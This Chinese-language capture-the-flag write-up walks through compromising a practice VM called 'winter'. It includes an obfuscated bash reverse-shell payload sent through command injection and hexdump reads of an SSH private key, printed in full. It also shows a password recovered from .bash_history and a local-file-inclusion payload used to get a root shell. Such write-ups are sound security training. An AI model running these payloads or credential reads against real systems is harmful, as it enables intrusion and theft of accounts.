Initial Access#
开局 22 和 80
踩点
目录扫描
有一个 robots.txt 和文件上传
└─# curl http://`IP`/robots.txt
Look for some real vulnerabilities ;)
id
whoami
ls
pwd
netstat -ano
catchme
winter
cd
cd ../
ftp
ssh
http
smtp
manager
admin
superadmin
ceo
cto
https
tftp
nano
vim
parrot
linux
shell
让我们留意真实的漏洞,也就是会可能会有兔子洞~
注册页面
注册后登录
News 中贴心的给出了提示:
1. winter_hacker found OS Command injection .
2. catchme found File Upload Vulnerability .
3. Technical Support found IDOR .
Read More about OS Command Injection
That's all for today's news
这告诉我们后台可能存在命令注入和文件上传、
大字典扫描,还有一个提示
将 winter 加入 hosts 解析,做子域名爆破
ffuf -u http://192.168.56.92/ -H 'Host: FUZZ.winter' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 -ac
扫到两个子域名
访问
目录扫描
└─# gobuster dir -ek -t 100 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://manager.winter -x php,txt
└─# gobuster dir -ek -t 100 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://cmd.winter -x php,txt
manual/是 apache 手册页
manager 子域有个登录框
cmd 子域有个shellcity.php,是一个发送信息的页面
显然最后一个最可疑
乱输的话会提示:
敲两个 id 试试:
没想到直接出来了
深入测试,发现有诸多限制。但是既然能执行命令,这显然是个突破口,于是 fuzz 参数:
ffuf -u http://cmd.winter/shellcity.php?FUZZ=id -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ac
很快跑出来一个run
那么直接拼接反弹 shell 命令:
http://cmd.winter/shellcity.php?run=printf%20KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41Ni4xMDAvMTIzNCAwPiYxKSAm|base64%20-d|bash
Privilege Escalation#
catchme#
开局一个提示:
www-data 可以以 catchme 用户的身份执行 hexdump 命令,从而读取任意文件。
www-data@winter:/var/www/cmd$ sudo -u catchme hexdump -C /home/catchme/user.txt
00000000 48 4d 56 6c 6f 63 61 6c 68 6f 73 74 0a |HMVlocalhost.|
0000000d
www-data@winter:/var/www/cmd$ sudo -u catchme hexdump -C /home/catchme/.ssh/id_rsa
00000000 2d 2d 2d 2d 2d 42 45 47 49 4e 20 4f 50 45 4e 53 |-----BEGIN OPENS|
00000010 53 48 20 50 52 49 56 41 54 45 20 4b 45 59 2d 2d |SH PRIVATE KEY--|
00000020 2d 2d 2d 0a 62 33 42 6c 62 6e 4e 7a 61 43 31 72 |---.b3BlbnNzaC1r|
00000030 5a 58 6b 74 64 6a 45 41 41 41 41 41 42 47 35 76 |ZXktdjEAAAAABG5v|
00000040 62 6d 55 41 41 41 41 45 62 6d 39 75 5a 51 41 41 |bmUAAAAEbm9uZQAA|
00000050 41 41 41 41 41 41 41 42 41 41 41 42 46 77 41 41 |AAAAAAABAAABFwAA|
00000060 41 41 64 7a 63 32 67 74 63 6e 0a 4e 68 41 41 41 |AAdzc2gtcn.NhAAA|
00000070 41 41 77 45 41 41 51 41 41 41 51 45 41 74 53 53 |AAwEAAQAAAQEAtSS|
00000080 4e 55 6d 4f 32 30 46 4a 6e 49 47 47 74 6d 35 67 |NUmO20FJnIGGtm5g|
00000090 57 44 33 78 41 31 5a 47 66 67 34 78 6d 56 74 57 |WD3xA1ZGfg4xmVtW|
000000a0 46 6f 35 75 56 4c 47 38 57 42 74 4b 77 54 4d 62 |Fo5uVLG8WBtKwTMb|
000000b0 50 0a 65 54 30 52 78 70 32 32 39 61 51 34 62 6b |P.eT0Rxp229aQ4bk|
000000c0 70 67 62 32 45 56 4b 51 6a 65 45 6c 58 52 47 39 |pgb2EVKQjeElXRG9|
000000d0 44 6a 68 52 41 52 6b 43 6d 2f 49 61 46 77 54 38 |DjhRARkCm/IaFwT8|
000000e0 54 64 53 33 52 50 68 72 48 35 44 45 33 47 4d 64 |TdS3RPhrH5DE3GMd|
000000f0 77 44 5a 46 61 4b 61 49 0a 4a 37 51 63 5a 6f 73 |wDZFaKaI.J7QcZos|
00000100 4d 4c 54 2b 6f 35 65 45 37 31 6b 69 32 5a 42 4a |MLT+o5eE71ki2ZBJ|
00000110 48 67 69 43 71 65 69 4a 47 31 64 4d 2b 56 32 57 |HgiCqeiJG1dM+V2W|
00000120 37 67 58 72 71 36 76 43 41 56 57 67 4a 36 39 4b |7gXrq6vCAVWgJ69K|
00000130 51 56 61 78 56 31 71 6d 4e 45 37 31 4b 6b 6a 0a |QVaxV1qmNE71Kkj.|
00000140 31 43 6e 6b 42 46 6f 6e 73 66 39 74 51 74 31 32 |1CnkBFonsf9tQt12|
00000150 47 4a 6d 2f 75 38 62 76 57 48 41 49 34 5a 4f 75 |GJm/u8bvWHAI4ZOu|
00000160 6e 63 36 6f 53 56 45 4f 51 57 55 30 64 77 32 6f |nc6oSVEOQWU0dw2o|
00000170 50 43 2b 51 44 79 72 30 30 37 54 2f 62 6d 6c 58 |PC+QDyr007T/bmlX|
00000180 6d 4e 7a 50 6d 4f 0a 6a 66 44 76 46 78 65 37 39 |mNzPmO.jfDvFxe79|
00000190 58 73 42 6b 4d 78 67 76 77 6e 51 4a 55 36 71 48 |XsBkMxgvwnQJU6qH|
000001a0 30 38 66 4c 38 2b 32 46 46 7a 79 49 68 66 71 2f |08fL8+2FFzyIhfq/|
000001b0 44 66 66 47 5a 58 74 64 33 47 43 39 6f 6a 73 55 |DffGZXtd3GC9ojsU|
000001c0 50 70 2b 6c 59 65 4e 44 70 48 48 35 6e 0a 64 69 |Pp+lYeNDpHH5n.di|
000001d0 39 6d 53 44 69 7a 2b 51 41 41 41 38 6a 4d 41 35 |9mSDiz+QAAA8jMA5|
000001e0 36 36 7a 41 4f 65 75 67 41 41 41 41 64 7a 63 32 |66zAOeugAAAAdzc2|
000001f0 67 74 63 6e 4e 68 41 41 41 42 41 51 43 31 4a 49 |gtcnNhAAABAQC1JI|
00000200 31 53 59 37 62 51 55 6d 63 67 59 61 32 62 6d 42 |1SY7bQUmcgYa2bmB|
00000210 59 50 66 45 0a 44 56 6b 5a 2b 44 6a 47 5a 57 31 |YPfE.DVkZ+DjGZW1|
00000220 59 57 6a 6d 35 55 73 62 78 59 47 30 72 42 4d 78 |YWjm5UsbxYG0rBMx|
00000230 73 39 35 50 52 48 47 6e 62 62 31 70 44 68 75 53 |s95PRHGnbb1pDhuS|
00000240 6d 42 76 59 52 55 70 43 4e 34 53 56 64 45 62 30 |mBvYRUpCN4SVdEb0|
00000250 4f 4f 46 45 42 47 51 4b 62 38 68 0a 6f 58 42 50 |OOFEBGQKb8h.oXBP|
00000260 78 4e 31 4c 64 45 2b 47 73 66 6b 4d 54 63 59 78 |xN1LdE+GsfkMTcYx|
00000270 33 41 4e 6b 56 6f 70 6f 67 6e 74 42 78 6d 69 77 |3ANkVopogntBxmiw|
00000280 77 74 50 36 6a 6c 34 54 76 57 53 4c 5a 6b 45 6b |wtP6jl4TvWSLZkEk|
00000290 65 43 49 4b 70 36 49 6b 62 56 30 7a 35 58 5a 62 |eCIKp6IkbV0z5XZb|
000002a0 75 42 0a 65 75 72 71 38 49 42 56 61 41 6e 72 30 |uB.eurq8IBVaAnr0|
000002b0 70 42 56 72 46 58 57 71 59 30 54 76 55 71 53 50 |pBVrFXWqY0TvUqSP|
000002c0 55 4b 65 51 45 57 69 65 78 2f 32 31 43 33 58 59 |UKeQEWiex/21C3XY|
000002d0 59 6d 62 2b 37 78 75 39 59 63 41 6a 68 6b 36 36 |Ymb+7xu9YcAjhk66|
000002e0 64 7a 71 68 4a 55 51 35 42 0a 5a 54 52 33 44 61 |dzqhJUQ5B.ZTR3Da|
000002f0 67 38 4c 35 41 50 4b 76 54 54 74 50 39 75 61 56 |g8L5APKvTTtP9uaV|
00000300 65 59 33 4d 2b 59 36 4e 38 4f 38 58 46 37 76 31 |eY3M+Y6N8O8XF7v1|
00000310 65 77 47 51 7a 47 43 2f 43 64 41 6c 54 71 6f 66 |ewGQzGC/CdAlTqof|
00000320 54 78 38 76 7a 37 59 55 58 50 49 69 46 2b 72 38 |Tx8vz7YUXPIiF+r8|
00000330 0a 4e 39 38 5a 6c 65 31 33 63 59 4c 32 69 4f 78 |.N98Zle13cYL2iOx|
00000340 51 2b 6e 36 56 68 34 30 4f 6b 63 66 6d 64 32 4c |Q+n6Vh40Okcfmd2L|
00000350 32 5a 49 4f 4c 50 35 41 41 41 41 41 77 45 41 41 |2ZIOLP5AAAAAwEAA|
00000360 51 41 41 41 51 41 57 41 6e 48 31 62 38 34 33 73 |QAAAQAWAnH1b843s|
00000370 37 74 36 45 4d 52 43 0a 59 70 46 54 6f 6c 70 53 |7t6EMRC.YpFTolpS|
00000380 57 4e 5a 54 36 6f 78 49 77 72 72 78 4c 53 64 4c |WNZT6oxIwrrxLSdL|
00000390 39 64 64 73 54 73 39 44 46 4f 6b 43 70 79 76 77 |9ddsTs9DFOkCpyvw|
000003a0 77 52 73 49 37 38 49 33 6a 47 76 35 50 49 65 51 |wRsI78I3jGv5PIeQ|
000003b0 71 39 59 6e 7a 69 75 52 51 4b 6c 55 63 71 0a 5a |q9YnziuRQKlUcq.Z|
000003c0 66 71 4f 4c 6a 57 44 56 49 53 2f 68 44 67 63 64 |fqOLjWDVIS/hDgcd|
000003d0 6a 36 31 34 43 59 37 54 51 50 42 5a 68 61 36 35 |j614CY7TQPBZha65|
000003e0 33 6b 6c 73 64 6d 39 6a 2b 6d 54 32 65 64 51 76 |3klsdm9j+mT2edQv|
000003f0 7a 52 42 44 69 61 7a 4e 42 46 69 4f 30 76 62 65 |zRBDiazNBFiO0vbe|
00000400 53 79 34 4d 47 0a 6d 6a 76 75 57 77 6a 74 6e 61 |Sy4MG.mjvuWwjtna|
00000410 59 41 79 45 6a 65 4f 38 7a 68 39 4e 51 58 41 47 |YAyEjeO8zh9NQXAG|
00000420 72 4c 69 59 78 73 79 42 68 45 44 63 74 56 39 51 |rLiYxsyBhEDctV9Q|
00000430 4e 33 45 2f 32 78 67 6e 30 47 37 32 31 72 62 62 |N3E/2xgn0G721rbb|
00000440 73 58 36 71 6d 7a 2b 52 6c 74 57 33 0a 44 46 4c |sX6qmz+RltW3.DFL|
00000450 43 46 54 6a 51 69 4c 4a 65 2b 62 34 79 6d 48 70 |CFTjQiLJe+b4ymHp|
00000460 35 4c 74 6f 43 38 72 6e 62 70 4a 41 71 69 75 41 |5LtoC8rnbpJAqiuA|
00000470 4f 6e 4a 77 77 72 6f 38 38 4c 53 75 71 47 2b 6f |OnJwwro88LSuqG+o|
00000480 2b 78 79 47 76 4d 6f 45 4b 6a 4d 35 70 65 51 73 |+xyGvMoEKjM5peQs|
00000490 2f 67 35 0a 36 38 55 6a 65 77 58 48 35 36 68 39 |/g5.68UjewXH56h9|
000004a0 44 47 76 54 69 2b 7a 55 6d 50 30 66 51 68 36 52 |DGvTi+zUmP0fQh6R|
000004b0 32 4c 53 33 73 6c 6e 64 79 68 59 33 33 5a 65 39 |2LS3slndyhY33Ze9|
000004c0 41 41 41 41 67 51 44 67 78 6b 4c 57 61 56 36 56 |AAAAgQDgxkLWaV6V|
000004d0 61 52 31 39 76 4a 53 4b 75 45 0a 62 7a 4f 61 66 |aR19vJSKuE.bzOaf|
000004e0 7a 31 56 58 49 41 65 62 65 59 30 72 7a 46 36 35 |z1VXIAebeY0rzF65|
000004f0 49 56 75 5a 50 65 75 38 69 34 65 72 35 45 2b 44 |IVuZPeu8i4er5E+D|
00000500 46 32 43 43 6f 46 48 46 61 30 39 67 6c 57 6a 36 |F2CCoFHFa09glWj6|
00000510 53 2f 30 71 70 68 48 69 71 46 30 51 68 6b 54 4f |S/0qphHiqF0QhkTO|
00000520 56 0a 33 62 6d 7a 6d 48 4d 50 62 37 61 7a 2f 30 |V.3bmzmHMPb7az/0|
00000530 2b 6c 6c 2f 39 35 71 70 78 52 5a 79 33 68 33 58 |+ll/95qpxRZy3h3X|
00000540 52 61 43 38 50 77 4d 50 63 79 6e 44 46 4d 49 67 |RaC8PwMPcynDFMIg|
00000550 63 70 2f 55 4f 66 70 74 2f 42 41 30 53 35 2b 6d |cp/UOfpt/BA0S5+m|
00000560 34 73 75 55 37 37 65 77 0a 4d 57 42 4d 46 6e 31 |4suU77ew.MWBMFn1|
00000570 50 63 78 6e 77 41 41 41 49 45 41 34 5a 6a 68 45 |PcxnwAAAIEA4ZjhE|
00000580 4e 39 72 51 32 46 57 6f 44 51 49 58 75 6c 32 34 |N9rQ2FWoDQIXul24|
00000590 45 61 64 5a 30 4c 42 44 50 72 6b 41 36 6c 43 2f |EadZ0LBDPrkA6lC/|
000005a0 36 6c 76 79 46 42 33 48 73 49 52 64 66 48 6f 0a |6lvyFB3HsIRdfHo.|
000005b0 62 5a 71 71 6d 78 2b 70 31 53 63 71 4d 4f 43 37 |bZqqmx+p1ScqMOC7|
000005c0 36 69 70 41 74 50 6d 6d 35 2f 50 6b 73 43 58 31 |6ipAtPmm5/PksCX1|
000005d0 43 71 42 31 37 37 55 35 54 32 44 42 67 63 35 59 |CqB177U5T2DBgc5Y|
000005e0 51 48 37 6e 4b 57 69 6d 64 6b 52 61 34 2b 46 39 |QH7nKWimdkRa4+F9|
000005f0 6d 37 75 6d 39 78 0a 58 33 77 47 36 6d 6c 50 69 |m7um9x.X3wG6mlPi|
00000600 6f 35 35 47 4e 54 4c 45 68 37 47 75 39 50 42 4c |o55GNTLEh7Gu9PBL|
00000610 38 4a 35 59 5a 45 74 57 70 71 35 78 54 54 39 65 |8J5YZEtWpq5xTT9e|
00000620 79 56 70 44 38 46 6d 63 41 41 41 43 42 41 4d 32 |yVpD8FmcAAACBAM2|
00000630 4e 2f 68 41 6d 4c 76 41 30 2b 67 69 37 0a 51 4f |N/hAmLvA0+gi7.QO|
00000640 68 4a 36 2f 77 2b 43 77 74 50 76 35 4b 67 66 65 |hJ6/w+CwtPv5Kgfe|
00000650 78 6c 6e 50 50 32 45 38 33 37 38 61 4a 75 35 67 |xlnPP2E8378aJu5g|
00000660 2b 4f 5a 4c 54 31 4f 59 58 4d 43 68 69 73 75 48 |+OZLT1OYXMChisuH|
00000670 53 46 43 6b 42 6f 45 52 53 72 45 58 51 68 49 74 |SFCkBoERSrEXQhIt|
00000680 2f 45 41 55 0a 61 64 41 55 4d 31 49 61 6e 6b 58 |/EAU.adAUM1IankX|
00000690 50 79 79 6e 78 47 56 49 57 6d 73 58 54 36 39 34 |PyynxGVIWmsXT694|
000006a0 4b 68 6c 4d 49 6d 44 65 53 31 4e 43 74 68 72 6f |KhlMImDeS1NCthro|
000006b0 32 6c 51 43 30 46 4b 59 57 53 38 4e 67 74 45 39 |2lQC0FKYWS8NgtE9|
000006c0 36 53 62 4f 32 57 69 61 52 7a 48 0a 42 62 6b 68 |6SbO2WiaRzH.Bbkh|
000006d0 72 6c 36 52 46 59 4b 64 34 4b 61 66 41 41 41 41 |rl6RFYKd4KafAAAA|
000006e0 44 6d 4e 68 64 47 4e 6f 62 57 56 41 64 32 6c 75 |DmNhdGNobWVAd2lu|
000006f0 64 47 56 79 41 51 49 44 42 41 3d 3d 0a 2d 2d 2d |dGVyAQIDBA==.---|
00000700 2d 2d 45 4e 44 20 4f 50 45 4e 53 53 48 20 50 52 |--END OPENSSH PR|
00000710 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d 0a |IVATE KEY-----.|
0000071f
但是私钥无法登录,想必是.ssh目录权限设置不严格,故意不让你登录。
那么试着读别的文件
www-data@winter:/var/www/cmd$ sudo -u catchme /usr/bin/hexdump -C "/home/catchme/.profile" | awk -F '[|]' '{print $2}' | tr -d '\n.'
# ~/profile: executed by the command interpreter for login shells# This file is not read by bash(1), if ~/bash_profile or ~/bash_login# exists# see /usr/share/doc/bash/examples/startup-files for examples# the files are located in the bash-doc package# the default umask is set in /etc/profile; for setting the umask# for ssh logins, install and configure the libpam-umask package#umask 022# if running bashif [ -n "$BASH_VERSION" ]; then # include bashrc if it exists if [ -f "$HOME/bashrc" ]; then "$HOME/bashrc" fifi# set PATH so it includes user's private bin if it existsif [ -d "$HOME/bin" ] ; then PATH="$HOME/bin:$PATH"fi# set PATH so it includes user's private bin if it existsif [ -d "$HOME/local/bin" ] ; then PATH="$HOME/local/bin:$PATH"fi
www-data@winter:/var/www/cmd$ sudo -u catchme /usr/bin/hexdump -C "/home/catchme/.bash_history" | awk -F '[|]' '{print $2}' | tr -d '\n.'
My Password is : winterusercatchexit
在.bash_history中发现了密码
root#
切换用户后,发现.ssh目录果然是 777 权限,修改后终于可以 ssh 上去了
sudo head 读取 flag。可以读取 id_rsa,但是同样上去不了,就问你气不气。。。
但是本地监听的 1336 端口服务我们没有用上
用 socat 转发到 8000 端口
目录扫描发现snowman.php
可以 fuzz,我这里给出读文件的方案
在/opt/customer下
catchme@winter:/opt/customer$ sudo head -1000 /opt/customer/snowman.php
<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" href="style.css">
<title>USER</title>
<style>
.avatar {
margin-left:10px;
margin-top:80px;
vertical-align: middle;
width: 50px;
height: 50px;
border-radius: 50%;
border:3px solid black;
}
ul {
list-style-type: none;
margin: 0;
<!--List of linux shells-->
padding: 0;
overflow: hidden;
background-color: #333;
}
li {
float: left;
}
li a {
display: block;
color: white;
text-align: center;
padding: 14px 16px;
text-decoration: none;
}
li a:hover {
background-color: #111;
</style>
</head>
<body style="background-color:black">
<br><br><br>
<div style="align:center;" class="divf">
<form class="box" method="POST">
<input required AUTOCOMPLETE="OFF" style="text-align:center;" type="text" placeholder="Message" name="name">
<input required AUTOCOMPLETE="OFF" style="text-align:center;" type="password" placeholder="To" name="pass">
<input type="submit" value="Send" name="sub">
</form>
</body>
</html>
<?php
session_start();
if(isset($_POST['sub']))
{
$us=$_SESSION['favcolor'];
$msg=$_POST['name'];
$to=$_POST['pass'];
echo "<script>alert('$msg , Send to $to')</script>";
if($msg==="id")
{
$ot=system($msg);
echo "<pre style='color:white;'>$ot</pre>";
}
else if($msg==="whoami")
{
$ot=system($msg);
echo "<pre style='color:white;'>$ot</pre>";
}
else if($msg==="pwd")
{
$ot=system($msg);
echo "<pre style='color:white;'>$ot</pre>";
}
else
{
echo "<script>alert('RCE Detected')</script>";
}
$fi=$_GET['exec'];
include($fi);
}
?>
漏洞点分析:
- system ($msg):白名单命令执行点
msg 只能是:id /whoami/pwd 才能触发命令执行,否则提示 “RCE Detected”。
没有注入点,不可控命令 → 此处暂无法利用
- include ($_GET ['exec']):文件包含漏洞(LFI)
这是主要的利用点。
可以通过包含日志文件、php 伪协议、会话文件、临时上传文件等方式,注入可控代码,进而实现远程代码执行。
那么我们先在靶机上创建一个反弹 shell 的文件,然后包含即可。
构造 payload:
curl 'http://192.168.56.92:8000/snowman.php?exec=/var/www/html/upload/r.php' -d 'sub=Send'
即可获得 root 的反弹 shell。